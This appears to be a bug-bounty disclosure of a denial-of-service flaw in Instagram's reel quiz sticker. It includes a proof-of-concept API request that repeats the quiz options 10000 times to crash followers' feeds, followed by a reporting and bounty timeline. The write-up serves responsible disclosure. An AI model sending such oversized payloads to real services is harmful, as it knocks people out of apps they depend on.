Permanent Crash Instagram Followers.

Description

Instagram has a feature for adding stickers to reels. One of the stickers was vulnerable to DoS because it had no character limit.

Impact

An attacker could crash the news feed of their followers without any user interaction, resulting in a permanent DoS where the victim can no longer use the Instagram app.

Proof of Concept

  • Create a reel with a quiz sticker and clone the quiz options 10000 times (written as *10000 below) in the following request:
POST
i.instagram.com/api/v1/media/configure_with_clips/

signed_body={"question":"foo","options":[{"text":"bar","count":0},
{"text":"bar","count":0},{"text":"bar","count":0},
{"text":"bar","count":0}*10000]

Timeline

17 June 2022 - Report sent
20 June 2022 - Need More Info
28 June 2022 - Triaged
15 July 2022 - $1000 Bounty rewarded by Meta